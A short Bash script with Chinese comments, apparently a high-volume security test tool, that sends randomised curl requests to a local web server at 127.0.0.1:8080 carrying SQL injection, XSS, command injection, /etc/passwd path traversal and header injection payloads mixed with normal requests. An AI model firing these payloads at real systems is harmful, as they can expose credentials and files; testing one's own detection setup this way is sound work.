#!/bin/bash

# 设置目标URL
TARGET="http://127.0.0.1:8080"

# 定义攻击payloads
SQL_PAYLOADS=("' OR '1'='1'" "' UNION SELECT null,username,password FROM users--")
XSS_PAYLOADS=("<script>alert(1)</script>" "<img src=x onerror=alert(1)>")
CMD_PAYLOADS=(";ls" "&& whoami")
DIR_PAYLOADS=("../../../../etc/passwd" "%2e%2e%2fetc%2fpasswd")
HEADER_PAYLOADS=("User-Agent: <script>alert(1)</script>" "Referer: javascript:alert(1)")

# 快速发送请求的函数
function rapid_fire() {
    local count=$1
    local i=0
    
    echo -e "\n[+] 开始快速测试 ($count 次请求)..."
    
    while ((i++ < count)); do
        # 随机选择测试类型（1-5为攻击，6为正常请求）
        case $((RANDOM % 6 + 1)) in
            1) # SQL注入
                payload=${SQL_PAYLOADS[$RANDOM % ${#SQL_PAYLOADS[@]}]}
                curl -s -G --data-urlencode "username=$payload" --data-urlencode "password=test" "$TARGET/login" >/dev/null
                ;;
            2) # XSS
                payload=${XSS_PAYLOADS[$RANDOM % ${#XSS_PAYLOADS[@]}]}
                curl -s -G --data-urlencode "search=$payload" "$TARGET/search" >/dev/null
                ;;
            3) # 命令注入
                payload=${CMD_PAYLOADS[$RANDOM % ${#CMD_PAYLOADS[@]}]}
                curl -s -G --data-urlencode "cmd=$payload" "$TARGET/execute" >/dev/null
                ;;
            4) # 目录遍历
                payload=${DIR_PAYLOADS[$RANDOM % ${#DIR_PAYLOADS[@]}]}
                curl -s -G --data-urlencode "file=$payload" "$TARGET/download" >/dev/null
                ;;
            5) # HTTP头注入
                payload=${HEADER_PAYLOADS[$RANDOM % ${#HEADER_PAYLOADS[@]}]}
                header_name=$(echo "$payload" | cut -d':' -f1)
                header_value=$(echo "$payload" | cut -d':' -f2-)
                curl -s -G -H "$header_name: $header_value" "$TARGET/admin" >/dev/null
                ;;
            6) # 正常请求
                curl -s -G "$TARGET/index.html" >/dev/null
                ;;
        esac
        
        # 显示进度（每100次打印一次）
        if ((i % 100 == 0)); then
            echo -n "."
        fi
    done
    
    echo -e "\n[+] 测试完成！共发送 $count 次请求"
}

# 主菜单
echo "=== 高速安全测试工具 ==="
read -p "输入要发送的请求次数: " num
rapid_fire "$num"
